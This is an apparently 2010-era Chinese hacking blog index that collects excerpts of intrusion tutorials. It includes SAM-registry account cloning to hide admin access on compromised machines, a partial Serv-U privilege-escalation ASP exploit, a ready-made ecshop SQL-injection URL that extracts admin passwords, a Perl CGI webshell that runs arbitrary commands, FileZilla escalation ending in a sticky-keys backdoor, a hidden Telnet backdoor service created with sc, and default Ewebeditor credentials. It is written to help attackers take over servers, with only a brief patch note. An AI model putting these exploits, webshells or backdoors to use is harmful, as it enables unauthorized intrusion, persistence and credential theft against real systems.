账户克隆原理介绍
作者:admin 日期:2010-07-27
相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样
那样的。其实克隆帐户很简单。就是复制administrator的注册表项。本篇文章针对已经使用过克隆的用户,不针对对克隆帐户一无所知者。
我只讲述下克隆的原理和方法。希望对大家有所启发。
原理:我们的帐户在注册表里都有他相应的键值,具体在 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users ”administrator 的
项为 “000001F4”下面有 2个二进制值 一个 是“F”一个是“V”。我一般克隆的都是 Guest用户,所以我就拿这个克隆这个用户做例子,
克隆其他用户方法相同。Guest的项为 “000001F5”。其他用户所对应的项可以从 “[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\
Users\Names”下查看。我们所要做的就是把“1F4”下的“F”和“V”值复制到“1F5”下的对应值里。这就是所说的克隆帐户。
1 简单克隆:
a,原理:只复制“F”值。这样克隆出来的帐户隐蔽性比完全克隆(一会要说到)要低些,但是对自己方便些。如果肉鸡的管理员不是
太厉害的话,建议你用这个方法。这样克隆出来的用户如果登陆上去,所用的桌面了什么的都是administrator的,也就是说你在系统里的
文件“C:\Documents and Settings\Administrator”和admin是一样的。而非以前的“C:\Documents and Settings\Guest”。但是在
“query user”和“终端服务管理器”里面你所登陆的用户还是“Guest”,还有就是用命令“net localgroup administrators”还是可以
看出Guest是管理员来,这就是我所说的隐蔽性比完全克隆要低些。但是在net下,和用户管理中都看不出Guest用户有什么问题。
防止aspx木马的IIS SPY变态功能
作者:admin 日期:2010-07-23
提权之iis spy利用
作者:admin 日期:2010-07-17
或许用过aspx大马的人知道一般aspx大马都有一个功能叫做"iis spy",它的作用就是列出服务器上面所有网站的信息,包括用户名,密码,路径以及捆绑的域名。
一般我们要是做旁注的时候只需要看目标网站在哪个路径下面然后尝试跳转过去或者cacls改下权限(我用的前一个服务器竟然就有这样的问题,直接cacls就可以修改权限,我自己给自己送了个webshell竟然还可以旁别人的,着实被恶心一下。)。
而且很多情况下,iis密码是乱码的,这我没有仔细研究过是不是随即产生的。但要是密码不是乱码的话你就要注意了,说不定这个密码和用户名就可以用来登陆ftp。不妨试下。上次一个shell把我深深地雷到了,管理员的密码竟然也这样暴露在阳光下。操到3389里登陆,提权都免了。
iis spy的作用主要就这两个了。
serv-u7,8,9本地提权exp
作者:admin 日期:2010-07-14
serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\Local Administrator Domain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以进去.建立好域的时候要等半分钟才能登陆.不然会出现错误.
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function
Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”"
End If
end Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
%>
<%
''----------自定义参数开始-----------
中转注入原理
作者:admin 日期:2010-07-14
呵呵,又来骗流量了。说起来真的是孤陋寡闻了,我听说中转注入这个方法大概是在几个月前,但这位寂寞的刺猬大侠好象在07年或者更早就弄出了这东西。刚听说中转注入的时候觉得很好奇,以为又出什么新招了,看了代码才知道原来所谓的中转注入其实就是传说当中的cookie注入。但cookie注入很烦琐,而且基本上只能用手工,所以我觉得这个中转注入的想法真的很巧妙,巧妙地把原来无法放阿D或者明小子上注的cookie中转到了url上面。
既然骗了人来这里看我写的这个无聊的文章,那我也稍微负点责好了,简单的说下原理。其实了解cookie注入的同学应该都明白的。
我不知道大家遇到cookie注入的时候是怎么注的,反正我是用的明小子里面带的浏览器,那个有个修改cookie的功能。然后再结合一下站长工具里面的一个escape加密工具就可以注入了。要是能直接暴出用户密码当然最好,要是暴不出真的就是一件非常烦琐的事情了。
比如有这么一个cookie注入点
Tags: 注入
360漏洞利用工具
作者:admin 日期:2010-07-12
ecshop search.php的注入漏洞-爆出管理员密码!
作者:admin 日期:2010-07-06
ecshop search.php的注入漏洞-爆出管理员密码!
利用语句:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code
解决方案
search.php
大概300 源
if (is_not_null($val) )
修改为
if (is_not_null($val) && is_numeric($key))
lcx不能转发ftp解决
作者:admin 日期:2010-06-15
点击下载此文件
如何绕过防注入
作者:admin 日期:2010-05-31
利用Perl提权
作者:admin 日期:2010-05-30
Perl 语言由 Larry Wall 创建,最初作为一种实用解释语言。其主要功能最初是用于分析基于文本的数据和生成这些数据的统计或结果。随着 Internet 的普及推广,我们已经感受到 Perl 在 CGI 编程和处理格式数据上的强大功能。由于 Perl 对 process、文档和文字有很强的处理、变换能力,因此凡是有关快速原型设计、系统工具、软件工具、系统管理、资料库连结、图像程式设计、网络连结和 WWW 程式设计等之类的任务,都特别适合用 Perl 来完成
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "
\r\n", 13);open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";system($execthis);syswrite(STDOUT, "\r\n\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cmd.pl上传至BIN目录执行,
(如果不能运行,可以试试改为cgi 扩展呢,把刚才的 pl文件改为 cgi文件)
在IE浏览窗口中提交提交 http://anyhost//cmd.pl?dir 即可开始执行命令,请注意这个SHELL是具有ADMIN权限的,能够添加帐号并加入管理员组,书写规则是在?后加入你需要执行的命令.
为什么安装PERL能导至黑客在服务器上提升权限呢?原理很简单,因为PERL在默认安装时BIN目录是具有EVERYONE的完全控制权限和CGI执行权限的,所以能执行任意命令,这是一个NTFS权限导至的提权漏洞.
asp实现端口扫描源码
作者:admin 日期:2010-05-30
今天碰到一个站很恶心,小马传上了大马楞是写不上,后来想了个办法只能把一个大马给拆解了。这是一个扫描端口的。以后碰到的时候直接就好用了。
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
ASP实现TCP端口扫描的方法
ASP实现TCP端口扫描的方法body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
.styleRed {color: #FF0000}
</style>
<title>ASP TCP Port Scanner for SpringBoard</title>
<%
cain嗅探突破ARP防火墙
作者:admin 日期:2010-05-29
MT的详细用法
作者:admin 日期:2010-05-18
用法: mt.exe <选项>
选项 :
-filter ---更改 TCP/IP 过滤器的开头状态
-addport ---添加端口到过滤器的允许列表
-setport ---设置端口作为过滤器的允许列表
-nicinfo ---列出 TCP/IP 界面信息
-pslist ---列出活动进程
-pskill ---杀毒指定进程
-dlllist ---列出指定进程的 DLL
-sysinfo ---列出系统信息
-shutdown ---关闭系统
-reboot ---重启系统
-poweroff ---关闭电源
-logoff ---注销当前用户会话
-chkts ---检查终端服务信息
-setupts ---安装终端服务
-remts ---卸载终端服务
-chgtsp ---重置终端服务端口
-clog ---清除系统日志
-enumsrv ---列出所有服务
-querysrv ---列出指定服务的详细信息
-instsrv ---安装一个服务
-cfgsrv ---更改服务配置
-remsrv ---卸载指定服务
-startsrv ---启动指定服务
-stopsrv ---停止指定服务
-netget ---从 http/ftp 下载
-redirect ---端口重定向
-chkuser ---列出所有账户、sid 和 anti 克隆
-clone ---克隆 admin 到目标
-never ---设置账户看上去从未登录
-killuser ---删除账户,甚至是 "guest" 也可删除
-su ---以 Local_System 权限运行进程
-findpass ---显示所有已登录用户的口令
-netstat ---列出 TCP 连接
-killtcp ---杀死 TCP 连接
-psport ---映射端口到进程
-touch ---设置文件日期和时间到指定值
-secdel ---安全擦除文件或目录占用的空间
-regshell ---进入一个控制台注册表编辑器
-chkdll ---检测 gina dll 后门
1.mt -sysinfo 查看机器配置
先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...
FileZilla提权
作者:admin 日期:2010-05-10
事情的起因:一次拿到一个个人讲师的webshell,想提权,服务器权限设置的不严,但是提权不好提,只有一个C盘,也没装什么软件,没 mysql,mssql,su,360等一些熟悉的提权软件。执行下命令看看吧!netstat -an看到有个默认的端口14147网上搜了下原来是一款叫做FileZilla的FTP软件的一个管理端口。网上搜了下FileZilla提权,还真有http://xiaoyi.us/archFPipe.exeives/230。用了此上说的方法,但是始终连接不上,可能真的像作者说的对与网络的带宽的要求很高,或者是硬防的问题。但是自己后来想,serv-U能通过lcx直接转发,然后本地连接,为什么还要用FPipe.exe这东西呢!重新试了下,转发的太少了,还是网速问题。5秒左右才返回一个5bytes数据包给本地。难道这个办法不行?不死心在虚拟机实验了。成功了,就有了此文。
首先找到FileZilla的安装目录,打开FileZilla Server Interface.xml,里面有管理口令
在虚拟机里进行转发如下图
这里使用的本地IP是127.0.0.1因为FileZilla的管理IP地址只能是127.0.0.1
转发成功了,返回信息
接下来就是用FileZilla客户端来连接了
嘿嘿,连接成功
接下来就是添加用户,设置目录为C盘,权限设置为完全控制即可
FileZilla Server不比serv-U,可以quote site exec执行dos命令,要实现提权的话可以FTP登录上去操作文件管理,如替换系统服务、替换系统文件、将程序置于启动目录等等。
我这里就替换粘贴键了,3389登陆,5下shift拿下服务器。
巧建Telnet后门
作者:admin 日期:2010-05-04
(一) 关于"Telnet"
Telnet用于Internet的远程登录.它可以使用户坐在已上网的电脑键盘前通过网络进入另一台已上网的电脑,使它们互相连通.这种连通可以发生在同一房间里面的电脑,或是在世界各范围内已上网的电脑.习惯上来说,被连通并且为网络上所有用户提供服务的计算机称之为服务器(Servers),而自己使用的机器则称之为客户机(Customer).一旦连通后,客户机可以享有服务器所提供的一切服务.用户可以进行通常的交互过程(注册进入,执行命令),也可以进入很多特殊的服务器,如寻找图书索引.网上不同的主机提供的各种服务都可以被使用.
下面介绍我们来认识一下关于Telnet的相关程序.
telnet.exe是客户机程序(Client),我们本地机登陆远程服务器就是通过它.
tlntsvr.exe是服务器程序(Server),在远程服务器运行,由Telnet服务指向并启动.
tlntadmn.exe是Telnet服务器管理程序,可以用它对服务器程序进行配置.
我们可以看到,如此方便的程序,给黑客们做后门是再好不过了.然而,服务器管理员迫于Telnet的"好名声",不敢享用这个好东西,纷纷把它禁用掉了,这就把我们小黑们用Telnet的权利给剥夺了.
(二) 夺回使用Telnet服务的权利
拿到服务器后,建个隐藏用户是"小菜一碟".但是以后我们通过什么样的途径进入呢?此时,服务端禁用的Telnet服务常令小黑们咬牙切齿.要想使用它必须让服务器端程序tlntsvr.exe运行.不过,如果把禁用的服务重新启用,不等于告诉管理员我们到这里遛过一圈吗?看来只能另想其他方法了.这里我给大家提供两种方法:
方法一:
既然tlntsvr.exe是提供服务的主程序,我们重新建立一个服务指向它不就行了.这样查看服务时,Telnet服务虽然仍被禁用,可实际上,新建的服务已经让tlntsvr.exe为我们大开方便之门.
首先,在服务器端建立服务.我们用Windows自带的程序sc.exe实现.在命令行下键入"sc"显示帮助文件,sc.exe用法很多,这里我们用"sc create"命令来创建服务.
用法:sc create [service name] [binPath= ] <option1> <option2>...
键入命令 "sc create Security binPath= c:\windows\system32\tlntsvr.exe start= auto"
表示创建一个服务名称为Security,启动类型为自动的服务,服务指向程序"c:\windows\system32\tlntsvr.exe".
如果显示 [SC] CreateService SUCCESS 则表示服务创建成功.
然后,用"net start Security"命令启动服务.
这时,我们打开服务管理可见,Security服务已经启动,但Telnet服务依然显示禁用.(如图1)。
方法二:
上述方法虽然可以实现我们的目的,但缺点也是有的.我们用奇虎360查看一下服务(如图2)
Fckeditor漏洞利用方法总结
作者:admin 日期:2010-04-13
入侵的近点技巧
作者:admin 日期:2010-04-04
例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。
2. Ewebeditor拿站的新技巧
Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
3. 社工的小技巧
